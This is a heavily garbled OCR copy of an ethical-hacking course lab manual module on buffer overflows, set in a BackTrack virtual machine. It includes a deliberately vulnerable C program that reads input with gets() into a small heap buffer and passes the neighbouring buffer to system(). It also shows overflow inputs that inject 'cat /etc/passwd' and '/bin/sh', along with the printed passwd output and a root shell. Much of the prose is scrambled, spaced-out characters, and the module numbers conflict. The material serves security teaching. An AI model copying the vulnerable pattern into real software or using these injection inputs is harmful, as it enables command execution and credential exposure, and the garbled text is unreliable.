Contenu connexe Similaire à Ceh v8 labs module 18 buffer overflow Similaire à Ceh v8 labs module 18 buffer overflow (20) Ceh v8 labs module 18 buffer overflow1. CEH
B u ffe r
L ab M a n u a l
O v e r flo w
M o d u le 18
2. M odule 18 - B u ffer O verflo w
B u f f e r O v e r f lo w
A
tta c k
In ab ffe oefo , w ilew gda t abiffer, t eb/ffer’ b u d r is
u r v rl w h ritin ta o
h
s o n ay
o er nan a ja e tmmr iso ewite .
v ru d d c n e oy v r r t n
I CON KEY
Lab Scenario
V a lu a b le
i n t o r m a d o a ________
S o u r c e : h t t p : / / w w w . 1c .u 1 1ic a 1 1 1 p . b r / ~ - s t o l f i / u r n a / b u t f e r - o f l o w
Test yo u r
H a c k e r s c o n t in u o u s ly lo o k t o r v u ln e r a b ilit ie s 11 1 s o f tw a r e o r a c o m p u t e r t o b r e a k in t o
k n o w le d g e
th e s y s te m b y e x p lo it in g th e s e v u ln e r a b ilit ie s .
sA
W e b e x e rc is e
m
W o r k b o o k r e v ie w
T h e m o s t c o m m o n v u l n e r a b i l i t y o f t e n e x p l o i t e d is d i e b u f f e r o v e r f l o w
a p ro g ra m
1 1 1 t e s t i n g d i e l e n g d i o f s t r i n g i f i t lie s w i t h i n it s v a l i d r a n g e . A
a w e a k n e s s b y s u b m it t in g a n e x tr a - lo n g in p u t t o
its
a llo c a t e d i n p u t b u f f e r ( t e m p o r a r y
v a r ia b le s ,
a tta c k , w h e r e
f a ilu r e o c c u r s e ith e r 1 1 1 a llo c a t in g s u f f ic ie n t m e m o r y f o r a n i n p u t s t r in g o r
cause
th e
p ro g ra m
to
h a c k e r c a n e x p lo it s u c h
th e p r o g r a m , d e s ig n e d t o
s to ra g e a re a ) a n d m o d if y
ju m p
to
u n in te n d e d
o v e r f lo w
th e v a lu e s o f n e a r b y
p la c e s ,
o r
even
r e p la c e
th e
p r o g r a m 's in s t m c t i o n s b y a r b it r a r y c o d e .
I f th e b u f fe r o v e r f lo w
b u g s li e 1 1 1 a n e t w o r k s e r v ic e d a e m o n , t h e a t t a c k c a n b e d o n e
b y d ir e c d y fe e d in g th e
o r d in a r y
s y s te m
p o is o n o u s
p o is o n o u s in p u t s tr in g
t o o l o r a p p lic a tio n , w i t h
s tr in g w i d i a d o c u m e n t o r a n
p a s s iv e b u f f e r o v e r f lo w
o v e r f lo w
bugs
to
th e
d a e m o n . I f th e
d ir e c t a c c e s s , th e
e m a il w h ic h , o n c e
a tta c k . S u c h a tta c k s a re e q u iv a le n t t o
th e s y s te m w i d i d ie s a m e u s e r I D
B u ffe r
no
a re
d o e s n o t p r o v id e s b u i lt - i n
b u g lie s 1 1 1 a n
h a c k e r a tta c h e s
th e
o p e n e d , w i l l la u n c h
a
a h a c k e r lo g g in g in t o
a n d p r iv ile g e s a s d ie c o m p r o m is e d p r o g r a m .
e s p e c ia lly
co m m o n
a rra y b o u n d
111
C
p ro g ra m s ,
s in c e
t h a t la n g u a g e
c h e c k in g , a n d u s e s a f in a l n u l l b y te t o
t h e e n d o t a s t r in g , in s te a d o f k e e p in g it s le n g t h 1 1 1 a s e p a ra te f ie ld . T o
m a rk
m ake dungs
w o r s e , C p r o v id e s m a n y lib r a r y f u n c t io n s , s u c h as s t r c a t a n d g e t l i n e , w h ic h c o p y
s tr in g s w i t h o u t a n y b o u n d s - c h e c k in g .
A s
an
eth ical h a c k e r
e x p e rt
k n o w le d g e o f w h e n a n d h o w
b a se d
and
b u ffe r
o v e r f lo w s
h eap -b ased
b u f fe r o v e r f lo w
111
p en etration te s te r,
and
b u f fe r o v e r f lo w
b u f f e r o v e r flo w s , p e r f o r m
p ro g ra m s ,
and
ta k e
you
m ust
have
o c c u rs . Y o u m u s t u n d e rs ta n d
sound
sta c k s-
pen etratio n te s ts f o r d e t e c t i n g
t o p revent p r o g r a m s f r o m
p r e c a u t io n s
a tta c k s .
Lab Objectives
T h e
o b je c t iv e
o v e r f lo w
o f t i n s la b is t o
a tta c k s t o
1 1 1 t in s la b , y o u
h e lp
s tu d e n ts t o le a r n a n d p e r f o r m
n e e d to :
■
P r e p a re a s c r ip t t o
■
C E H Lab Manual Page 902
b u ffe r
e x e c u te p a s s w o r d s .
o v e r f lo w
b u ffe r
R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
3. M odule 18 - B u ffer O verflo w
■
■
& This lab can
be d e m o n stra te d
using B ack track
Virtual M achine
P e rfo rm
p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n
E n u m e ra te
a p a s s w o r d lis t
Lab Environment
W indows Server 2012
■
A
c o m p u te r r u n n in g w ith
■
A
V i r t u a l M a c h in e r u n n in g w i t h
■
A
w e b b ro w s e r w ith In te rn e t access
■
as H o s t m a c h in e
A d m in is t r a t iv e p r iv ile g e s t o 1 1 1 1 1 t o o ls
B ack T rack 5 R3
Lab Duration
T i m e : 2 0 A J in u t e s
Overview of Buffer Overflow
B u ffe r
o v e r f lo w
o v e rru n s
th e
is
an
b u f f e r 's
a n o m a ly w h e r e
b o u n d a ry
and
a p r o g r a m , w h ile
o v e r w r it e s
w n tin g
d a ta
a d ja c e n t m e m o r y . T in s
to
is
a
b u ffe r,
a s p e c ia l
c a s e o f v io la d o n o f m e m o r y s a fe ty . B u t t e r o v e r d o w s c a n b e tr ig g e r e d b y in p u t s d ia t
a re d e s ig n e d t o e x e c u te c o d e , o r a lte r th e w a y th e p r o g r a m
111
e r r a tic
c ra s h , o r
p ro g ra m
b e h a v io r ,
a
o f s y s te m
b re a c h
in c lu d in g
m e m o ry
s e c u r it y . T h u s ,
access
t lie v
a re
o p e r a te s . T i n s m a y r e s u lt
e rro rs ,
th e
in c o r r e c t
b a s is
o f m any
r e s u lt s ,
a
s o ftw a r e
v u ln e r a b ilit ie s a n d c a n b e m a lic io u s ly e x p lo it e d .
Lab Tasks
2 TASK 1
*
Overview
R e c o m m e n d e d la b s t o a s s is t y o u 1 1 1 b u f f e r o v e r f l o w :
■
E n u m e r a t in g P a s s w o rd s 11 1 “ D e f a u lt P a s s w o r d L is t ”
o
W r it e a C o d e
o
C o m p ile d ie C o d e
o
E x e c u te th e C o d e
o
P e rfo rm
o
O b t a i n C o m m a n d S h e ll
B u ff e r O v e r f lo w A t ta c k
Lab Analysis
A n a l y z e a n d d o c u m e n t t h e r e s u lt s r e la t e d t o t h e la b e x e r c is e . G i v e y o u r o p i n i o n o n
y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e .
P L E A S E
T A L K
T O
Y O U R
I N S T R U C T O R
R E L A T E D
C E H Lab Manual Page 903
T O
T H I S
I F
Y O U
H A V E
Q U E S T I O N S
L A B .
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
4. M odule 17 - B u ffer O verflo w
B u f f e r O v e r flo w
E x a m
p le
In ab rf ro ejlo , w ilew da t abrf r t eb ffe'sb u d r is
/fe v i w h riting ta o /fe, h u r o n ay
o er nan a ja e t■ e oyiso ewite .
v ru d d c n mmr v r r t n
I C O N
K E Y
Lab Scenario
/ V a lu a b le
in f o r m a tio n
y*
111
c o m p u te r
s e c u r it y
and
p r o g r a m m in g ,
a
b u ffe r
o v e r f lo w ,
0 1 ־b u ffe r
o v e rru n ,
v u ln e r a b ilit y a p p e a rs w h e r e a n a p p lic a tio n n e e d s t o r e a d e x t e r n a l in f o r m a t io n s u c h as
T est yo ur
k n o w le d g e
a c h a r a c te r s trin g , th e
s iz e
s
W e b e x e rc is e
m
W o r k b o o k r e v ie w
o f
d ie
in p u t
r e c e iv in g
s tr in g ,
and
b u t t e r is r e l a t i v e l y
th e
a p p lic a tio n
s m a ll c o m p a r e d
d o e s n 't
check
th e
to
th e
s iz e .
p o s s ib le
T lie
b u ffe r
a l lo c a t e d a t r u n - t i m e is p l a c e d 0 1 1 a s t a c k , w h i c h k e e p s t h e i n f o r m a t i o n f o r e x e c u t i n g
fu n c tio n s , s u c h
o v e r f lo w in g
a s lo c a l v a r ia b le s , a r g u m e n t v a r ia b le s , a n d
s t r in g c a n a lte r s u c h in f o r m a t io n . T in s
th e
re tu rn
a d d re s s . T lie
a ls o m e a n s t h a t a n a t ta c k e r c a n
c h a n g e th e in f o r m a t io n as h e 0 1 ־s h e w a n ts to . F o r e x a m p le , th e a tta c k e r c a n in je c t a
s e r ie s o f m a c h i n e l a n g u a g e c o m m a n d s a s a s t r i n g d i a t a l s o l e a d s t o
th e e x e c u tio n o f
th e a t ta c k c o d e b v c h a n g in g t h e r e t u r n a d d re s s t o t h e a d d re s s o f th e a t ta c k c o d e . T l ie
u l t i m a t e g o a l is u s u a lly t o g e t c o n t r o l o f a p r iv i le g e d s h e ll b y s u c h m e t h o d s .
P r o g r a m m i n g la n g u a g e s c o m m o n l y a s s o c i a t e d w i d i b u f f e r o v e r f l o w s i n c l u d e
C + + , w h ic h
p r o v id e
b u ilt - in
110
p r o te c tio n
C
and
a g a in s t a c c e s s in g 0 1 ־o v e r w r i t i n g d a ta 1 1 1
a n y p a r t o f m e m o r y a n d d o n o t a u t o m a tic a lly c h e c k d ia t d a ta w r i t t e n t o a n a r r a y (th e
b u ilt - in
b u ffe r
ty p e )
is w i d i i n
th e
b o u n d a r ie s
o f
d ia t a rra y .
B ounds
c h e c k in g
can
p r e v e n t b u f f e r o v e r f lo w s .
A s a
pen etratio n te ste r,
s m a s lu n g
o v e r f lo w
t im e
a tta c k s .
Y o u
a tta c k s . Y o u
checks,
a d d re s s
y o u s h o u ld b e a b le t o im p le m e n t p r o t e c t io n
m ust
can
be
a w a re
o f
p re v e n t b u ffe r
o b f u s c a t io n ,
a ll
d ie
d e fe n s iv e
o v e r f lo w
r a n d o m iz in g
a tta c k s
lo c a tio n
a g a in s t s t a c k -
m e a s u re s
by
o f
fo r
b u ffe r
im p le m e n tin g
fu n c tio n s
111
11111-
lib c ,
a n a ly z in g s t a t ic s o u r c e c o d e , m a r k i n g s t a c k a s 1 1 0 1 1 - e x e c u t e , u s i n g t y p e s a fe la n g u a g e s
s u c h as J a v a , M L , e tc .
Lab Objectives
T h e
o b je c t iv e
o v e r f lo w
o f t i n s la b is t o
1 1 1 t in s la b , y o u
C E H Lab Manual Page 904
h e lp
s tu d e n ts t o le a r n a n d p e r f o r m
b u ffe r
t o e x e c u te p a s s w o r d s .
n e e d to :
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
5. M odule 17 - B u ffer O verflo w
■
P r e p a re a s c r ip t t o
o v e r f lo w
b u ffe r
■
R u n t h e s c r ip t a g a in s t a n a p p lic a t i o n
■
P e rfo rm
■
E n u m e ra te
p e n e tr a t io n t e s tin g f o r th e a p p lic a tio n
a p a s s w o r d lis t
Lab Environment
I T This lab can
be d e m o n stra te d
using B ack track
Virtual M achine
W indows Server 2012
■
A
c o m p u te r r u n n in g w ith
■
A
Y i r m a l M a c h in e r u n n in g w i t h
■
A
w e b b ro w s e r w ith
■
as H o s t m a c h in e
Administrative privileges to run tools
B ack T rack 5 R3
Internet a c c e s s
Lab Duration
T im e : 2 0 M in u t e s
Overview of Buffer Overflow
B u ff e r o v e r f lo w
ta k e s p la c e w h e n
buffer b e c a u s e o f i n s u f f i c i e n t
m em ory a d d re sse s, w h i c h a r e
t h i s o c c u r s w h e n c o p y i n g strin g s o f
w r itte n to a
c o rru p ts t h e d a t a v a l u e s 1 1 1
allo cated b u f f e r . M o s t o f t e n
f r o m on e buffer to another.
b o u n d s c h e c k in g
a d ja c e n t t o th e
c h a ra c te rs
d a ta
W hen die following program is compiled and run, it will assign a block o t memory
1 bytes long to hold die attacker string, strcpy function will copy the string
1
“ D D D D D D D D D D D D D D ” into an attacker string, w hich will exceed the buffer
size o f 11 bytes, resulting 111 buffer overflow.
Bffe Oe wxmleCd
u r vrflo Ea p oe
#include<stdio.h>
int main ( int argc, char **argv)
{
char Bufferfll] =
״AAAAAAAAAA;״
strcpylBuffer/DDDDDDDDDODD;}״
printf(“96n .״Buffer);
0
0 1 2 3 4 5 6 7 8 9 1 1112
0
D D D D D D D D D D D D o
■
c
3 4
5 6 7
8 9
A A A A A A A A A A
1 2
3
4
String
10
0
i
S7 6״
return ;
}
This type o f vulnerability is prevalent in UNIX• and NT-based systems
Lab Tasks
S
TASK 1
W rite a Code
C E H Lab Manual Page 905
1.
Launch your B ack T rack 5 R3 Virtual Machine.
2.
For btlogui, type root and press Enter. Type the password as toor, and
press E nter to log 111 to BackTrack virtual machine.
Ethical Hacking and Countenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
6. M odule 17 - B u ffer O verflo w
BackTrack on WIN 2N9STOSGIEN Virtual Machine Connection
־R * ״T
יkVia C
lipboard V
iew
@3
1 ►ווh
פ
i . 0933761 HET: Registered protocol fa n ily 17
1 9 5 1 in u A T n ted Set 2 k y o rd a /d ;icc p tfo vi8 1 /'s 0 p t/'in u
.0 1 3 1 p t: T ra sla
e b a s c1 s^ la r1 ' l> 2 crio /in u p tl
1.0952761 Registering the dns resolver key type
1.0957031 registered ta sk stats version 1
1.1639921
Magic nunber: 12:12U:12G
1.1644561 acpi device:01: hash notches
1.105658) rtc.cn os 00:02: settin g syste* clock to 2012-09-25 11:06:59 UTC(1340571219)
1.165468) BIOS E O f a c il it y v0.16 2004-Jun-25, 0 devices found
D
1.1658621 C D information not availab le.
O
1.2378181 a ta l.0 6 : ATA-8: Uirtual HD, 1 .1 .0 , raax M D A
U M2
1.2389361 a ta l.0 6 : 33554432 scctors, nu lti 12B:
LBA48
1.2415511 ata2.06: AIAPI: Uirtual CD, , waxhUDt1A
2
1.2432671 ata2.06: configured for M D
U I1n2
1.2441181 a ta l.0 6 : configured for flU H
D flZ
1.244223) s c s i 0:0:0:6: Direct-Access
A
TA
Uirtual H
O
1 .1 . PQ: 6 AMSI: 5
1.2451571 sd 0:0:0:0: Isdal 33554432 512-byte logical blocks: (17.1 GB/16.0׳
GiB)
1.2455461 sd 0:0:0:0: Isdal 4096-hyte physical blocks
1.245974) sd 0:0:0:0: Isdal Write Protect Is o ff
1.2463841 sd 0:0:0:0: Attached sc si generic sgO type 0
1.2468141 sd 0:0:0:0: Isdal Urite cache: enabled, read cache: enabled, doesn't support D nr FIX
PT
1.2404231 sc s i 1:0:0 0: CD R M
O
Hsft
Uirtual CD/RO
M
1.0 PQ: 6 ANSI 5
1.2515061 sr6: sc si3 nnc drive: 0x/0 k tray
1.2526091 cdron: Uniform C H M driver Revision: 3.26
D U
1.2527931 sr 1:0:0:0: Attached sc si generic sg l type 5
1.25U657) sda: sdal r,da2 < xda5 >
1.2506591 *d 0:0:0:0: Inda I Att<1ch«d 8C5I disk
1.260263) Freeing uiuisimI kernel mmnnj; 96Hk rrixd
1.2608041 Urite protectI 1 | the karnal read only data: 1228Hk
M
1.26S6241 Freeing unused kernel Mwinj: 1732k freed
1.2699051 Freeing unused kernel »e 1 1 1492k freed
*nr j:
ling, please w a it. . .
1.2873151 udcv: starting version 151
1.2962U0I udevd (03): /•prot/׳U3/oun adj is deprecated, please use /p roc/tlJ/w n score adj instead.
1.3963921 Floppy driv e (s): fdO is 1.44f1
1.41 HH4 I FD 6 is an 02070.
C
2.02030?) Refined T8C clocksource calibration: 3692.970 fti. .־
׳
F IG U R E 1.1: BackTrack Log in
__ B u ffer overflow occurs
3.
T ype
s ta rtx
t o la u n c h d ie G U I .
when a program or process
BackTrack on WIN-2N9STOSGIEN Virtual Machine Connection
tries to store m ore data in a
■ Re
1-1°־* ־
I.V44 CSpbeard Vie
I't • (- ©3 1 1 h
>
1►
buffer.
1.24S974I sd 0:0:6:6: (sdal Urite Protect Is o ff
1.246384) sd 0:0:6:6: Attached sc si generic sy6 type 6
1.2468141 sd 0:0:6:6: Isdal Urite cache: enabled, read cache: enabled, doesn't support DP0 or FU1
1.2404231 sc si 1:6:6:0: C R M
D O
Msft
Uirtual C
D-RO
M 1 0 PQ: 6 AMSI: 5
l.25150bl sr6: sc si3 ־rwc drive: 0x/0־x tray
1.2526091 cdrm: Uniforn CD-W* driver Revision: 3.20
1.2527931 sr !:0:6:6: Attached sc si generic sy l type 5
I .2586571 sda: sdal sda2 < sda5 >
1.2506591
sd 0:0:6 6: (sdal Attaclied SCSI disk
1.2602631 Freeing unused kernel ncmury: 'J6Uk freed
1 .2608041 N rite protecting the kernel read-only data: 122IM
Ik
1.265624) Frrelny umis.d kern■• I fiiMitry: 1732k freed
1.269985) Freeing unused kern•I nonary: 1492k freed
ading, please u a i t ...
1.2873151 udev: starting version 151
1.29620BI udevd (83): /׳prc!c/H3/’
0«jr»_<1dj is deprei^ted, please use /proc/G3׳׳o«1*»_score_adj instead.
1.3963921 Floppy driv e (s): fd6 is 1.440
1.4133841 FK 6 la an H2678.
2.0203071 R.rfl1 d TSC clocksource calibration: 3692 .970 MHz.
»
cklrack 5 IQ - 64 Bit bt t ty l
y la tined out a fter 60 seconds.
System information as of Iuc Sep 25 16:45:47 1ST 2012
Systea load:
Usage o f ✓:
Oenortj usage:
Swap usage:
0.08
72.3* o f 15.23GB
35׳׳
O
k
Processes:
72
Users logged In:
0
IP address for eth6: 10.0.0.14
Graph th is data and ■nrvvjr th is syste* ot https:/✓landscape.canonical .con✓
F IG U R E 1.2: BackTrack G U I Login-Startx Comm and
4.
m
B ackT rack 5 R3
G U I d e s k to p o p e n s , as s h o w n in d ie f o llo w in g s c r e e n s h o t.
Code w h ich is entered
in kedit is case-sensitive.
C E H Lab Manual Page 906
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
7. M odule 17 - B u ffer O verflo w
F IG U R E 1.3: BackTrack 5 R3 Desktop
5.
B ackT rack A pplications
gedit T ext Editor.
S e le c t t h e
־
y
t. >r*
*
v
A cc esso rie s
/ לMem (»_J
* ^
^ BackTtock
m e n u , a n d t h e n s e le c t
^
Oik uwg* Analyzer
oedlt T t Editor
fcx
4&
#***%
£
internet
flPlom
ce
| TWmlrwl
)14 other
ס
Tkrminator
WKSound 6 V^deo
0
ca
System Tools
<< b a c k tra c k
Program ming languages
com m only associated w ith
buffer overflows include C
and C + + .
F IG U R E 1.4: Launching gedit Text E d itor
6.
E n t e r d ie f o llo w in g c o d e 11 1 g e d it T e x t E d it o r
(Note:
t h e c o d e is c a s e -
s e n s itiv e ) .
# i n c l u d e < s t d i o . h>
v o i d m a i n ()
{
c h a r *name;
c h a r *command;
n ame =( ch ar * ) m a l l o c ( 10) ;
command=(char * ) m a l l o c (128) ;
p r i n t f ( " a d d r e s s o f name i s : %dn", name) ;
p r i n t f ( " a d d r e s s o f command i s : %dn",command);
p r i n t f ( " D i f f e r e n c e be twe en a d d r e s s i s : %d n", commandC E H Lab Manual Page 907
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
8. M odule 17 - B u ffer O verflo w
n ame );
p r i n t f ( " E n t e r y o ur n a m e : " ) ;
gets(name);
p r i n t f (" H e l l o % s n ", n a me ) ;
syst em( command) ;
}
>׳׳
v
x *u n s a v e d Docum ent 1 ־g e d it
File Edit View Search Tools Documents Help
^^^Jo p e n
▼ ^_Save
Undo
^ 9k
Ii=y1 Code is compiled using
the follow ing commend: gee
n *Unsaved Document 1 X
buffer.c biiffer.
# 1 nclude<std1 0 .h>
vo id m ain ()
{
char •name;
char •command;
name=(char * )m a llo c (1 0 );
command=(char * )m a llo c (1 2 8 );
p r in t f ( " a d d r e s s o f name i s : %dn",nam e);
p r in t f ( " a d d r e s s o f command is:%dn",com m and);
p r i n t f ( “ D iffe r e n c e between address i s :%dn“ ,command-name);
p r i n t f ( " E n t e r your name:“ ) ;
g e ts(n am e);
p r i n t f C ’H e llo %sn",nam e);
system ( command) ;
Plain Text ▼
Tab Width: 8 ▼
Ln 15, Col 2
F IG U R E 1.5: W riting code fo r execution
7.
ט
s a v e d ie p r o g r a m
S ave
as s h o w n 111 th e f o llo w in g s c re e n s h o t s c re e n s h o t as b u ffe r .c .
N o to o l can solve
completely die problem o f
buffer overflow , but die)■׳
b y s e le c tin g
File )־־S ave A s )־root
N o w
o r s im p ly c lic k
__ _* *Unsaved Document 1 ־g edit
File Edit View Search Tools Documents Help
surely can decrease the
probability o f stack smashing
attacks.
N o w
Compile th e Code
C E H Lab Manual Page 908
la u n c h d ie c o m m a n d t e r m in a l a n d c o m p ile d ie
co d e
by
running:
gcc b u f f e r . c -o b u f f e r
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
9. M odule 17 - B u ffer O verflo w
/v
v
x
root@bt: -
File Edit View Terminal Help
root@ bt: | #־־gcc b u ffe r.c -0 b u ffe rfj
The program executes
using follow ing command:
.!buffer
F IG U R E 1.7: BackTrack com piling the code
9.
I f th e re a re a n y e rro rs ,
/v
v
X
ignore
th e m .
r o o tc a b t: -
File Edit View Terminal Help
ro o tg b t:-# gcc b u ffe r .c ■0 b u ffe r
b u ffe r .c : In fu n c tio n 'm a in ':
—
b u f fe r . c : 6 : warning: in com p atible im p l ic i t d e c la ra tio n o f b u itfs tlH ^ u n c tio n ‘ mal
loc1
^•—— —
׳
b u f fe r . c : 8 : w arning: form at '%d' expects type 1 " ־n t ' , but a rg u m e n t^'tts s type 'ch
ar • ׳
b u ffe r .c :9 : warning: form at '%d' expects type , i n j ^ o u t argument 2 jM F t y p e *ch
ar »'
g
b u f f e r . c : 1 0 : w arning: form at '%d' expects type ' i n t , ׳but a rg um ent# has type ' I
ong i n t '
/tm p/ccx6 Y 3vl.o: In fu n c tio n m a in ':
b u ffe r .c : ( .te x t+ 6 x 9 0 ): warning: the g e ts ' fu n c tio n is dangerous a n ^ t a u ^ ^ i o t
be used.
root@bt:~# [ ]
: b a c k I tra c k
F IG U R E 1.8: BackTrack E rro r Message W in d o w
— j
1 0 . T o e x e c u te th e p r o g r a m
ty p e .
/buffer
E x ecu te th e Code
C E H Lab Manual Page 909
Ethical Hacking and Countemieasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
10. M odule 17 - B u ffer O verflo w
־
־
*
ro o t@ b t: ~
File Edit View Terminal Help
r o o tg b t: •/ . | #־b u f fe r |
address o f name is : 20144144
address o f command i s :20144176
D iffe re n c e between address is :32
E nter your name:|
m
1
A n executable program
■
o n a disk contains a set o f
binary instructions to be
executed by die processor.
t r a c k ^ )1
back
.
ם
F IG U R E 1.9: BackTrack Executing Program
1 1 . T y p e a n y n a m e 1 1 1 d ie
Input
h e ld a n d p re s s
Enter;
h e re , u s in g
Jaso n
as a n
exam ple.
»
- :v
x ro o t@ b t
File Edit View Terminal Help
root@bt:~#
address o f
address o f
D iffe re n c e
Enter your
ca
B u ffer overflows w o rk
by manipulating pointers
. /b u f f e r
name is : 20144144
command i s : 26144176
between address is : 32
name:| נas |
b a ck I tra c k
(including stored addresses).
F IG U R E 1.10: In p u t Field
12. Hello J a s o n
C E H Lab Manual Page 910
s h o u ld b e p r in t e d .
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
11. M odule 17 - B u ffer O verflo w
/
- :v
x
ro o t@ b t
File Edit View Terminal Help
root@bt:~#
address o f
address o f
D iffe re n c e
E n te r your
./ b u ffe r
name i s : 26144144
command i s : 20144176
between address i s : 32
name: Jason
״oot®bt:~# fl
b a c k I tra c k
F IG U R E 1.11: H ello Jason
B
T A S K
4
Perform Buffer
Overflow A ttack
1 3 . N o w , o v e r f lo w t h e b u f f e r a n d e x e c u te t h e lis te d s y s te m c o m m a n d s .
14.
R u n d ie p r o g r a m
15. T y p e
Input
a g a in b y t y p i n g
./buffer.
12345678912345678912345678912345cat /e tc /p a s s w d 111 t l i e
h e ld .
1 6 . Y o u c a n v ie w a p r i n t o u t o f d i e p a s s w o r d h ie .
a
v
א
ro o t@ b t: -
File Edit View Terminal Help
root@ bt:~# ./ b u ffe r
address o f name i s : 17747984
address o f command i s :17748016
D iffe re n c e between address i s :32
E n te r your name:|12345678912345678912345678912345cat /etc/passwd|
H e llo 12345678912345678912345678912345cat /etc/passwd
r o o t: x : e : 0 : r o o t: / r o o t: /bin/bash
daemon: x : 1 : 1 : daemon: /us r / s b in : /bin/sh
bin:x :2 :2 :bin:/bin:/bin/sh
sys: x : 3 : 3 : sys: /d e v : /bin/sh
Buffer overflow
vulnerbililties typically occur
in code that a programmer
cannot accratelv predict
buffer overflow behvior.
sync: x : 4 :65534:sync: / b i n : /b in /s y n c
games: x : 5 : 60: games: /us r/games: /bin/sh
man: x : 6 : 1 2 : man: /v a r/cache/m an: /b in /s h
I p : x : 7 : 7 : I p : / v a r / s p o o l/lp d : /b in /s h
m a il: x^S: 8 : m a il: /va r/m aiU / b in / sh
_
news: x t : 9: news: /va r/sp o jj/n e w s: /tj^n/shg
luiicp: x :1 e : l e : ifticjfc/var/spdol/uucp ijrbinTMf
proxy :x: 13:13:proxy:/b1n:/b1n/sh
I
L w w d ata:x:3 3 :3 3 :w w w - d ata:/var/w w */b inft(l I
I
backup: x : 3 4 :34 :backup: /v a r/ b a ck u p f/ b in / sh
U s t :x :3 8 :3 8 :H a ilin g L i s t H a n a g e r :/ v a r / lis t:/ b in / s h
i r e : x :3 9 :3 9 :i re d : /va r / ru n / i re d : /bin/sh
g n a ts :x :4 1 :4 l:G n a ts Bug-Reporting System (a d m in ):/ v a r/ lib / g n a ts :/ b in / s h
( lib u u id : x :1 0 0 :1 6 1 ::/ v a r / lib / lib u u ld : /bin/sh
F IG U R E 1.12: Executing Password
■m.
T A S K
5
Obtain Com m and
Shell
C E H Lab Manual Page 911
1 7 . N o w , o b t a i n a C o m m a n d S h e ll.
18.
a g a i n ./buffer a n d t y p e
12345678912345678912345678912345/ b i n / s h 111 the Input field.
R u n d ie p r o g r a m
Ethical Hacking and Countenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.
12. M odule 17 - B u ffer O verflo w
/
v
v
x root@ bt: -
File Edit View Terminal Help
m
root@bt:~# . / b u f f e r
address o f name is : 24616976
address o f command i s :24617008
D iffe re n c e between address is :32
E nter your nameJ12345678912345678912345678912345/bm/sh|
H e llo 12345678912345678912345678912345/bin/sh
s h-4.1#
s h-4.1#
sh-4.1# [ ]
Code scrutiny (writing
secure code) is die best
possible solution to
b uffe rflow attacks.
back
tra c k
F IG U R E 1.13: Executing 12345678912345678912345678912345/bin/sli
19. T y p e
Exit 1 1 1
S h e ll K o n s o l e 0 1 ־c lo s e t h e p r o g r a m .
Lab Analysis
A n a l y z e a n d d o c u m e n t d i e r e s u lt s r e la t e d t o d i e la b e x e r c is e . G i v e y o u r o p i n i o n 0 1 1
y o u r t a r g e t ’s s e c u r it y p o s t u r e a n d e x p o s u r e .
T o o l/U tility
I n f o r m
a tio n
C o lle c te d /O b je c tiv e s
A c h ie v e d
■
A d d r e s s o f n a m e is : 2 4 6 1 6 9 7 6
■
A d d r e s s o f c o m m a n d is : 2 4 6 1 7 0 0 8
■
D iffe r e n c e
■
E n te r y o u r n a m e :
b e t w e e n a d d r e s s is : 3 2
1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in / s h
B u ffe r O v e rflo w
■
H e llo
1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 1 2 3 4 5 /b in /s h
י
T A L K
T O
s h -4 .1 #
י
P L E A S E
s h -4 .1 #
י
s h -4 .1 #
Y O U R
I N S T R U C T O R
R E L A T E D
C E H Lab Manual Page 912
T O
T H I S
I F
Y O U
L A B .
H A V E
Q U E S T I O N S
13. M odule 17 - B u ffer O verflo w
Questions
1.
E v a lu a t e v a r io u s m e th o d s t o
2.
A n a ly z e h o w
3.
E v a lu a t e a n d lis t th e c o m m o n c a u s e s o f b u f f e r - o v e r f lo w
.N E T
I n te r n e t
D
C E H Lab Manual Page 913
d e te c t r u n - tim e
b u f f e r o v e r f lo w .
e rro rs u n d e r
la n g u a g e .
C o n n e c tio n
Y e s
P la tf o r m
0
to
p r e v e n t b u f f e r o v e r f lo w .
R e q u ir e d
0 N
o
S u p p o r te d
C la s s r o o m
0
!L a b s
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.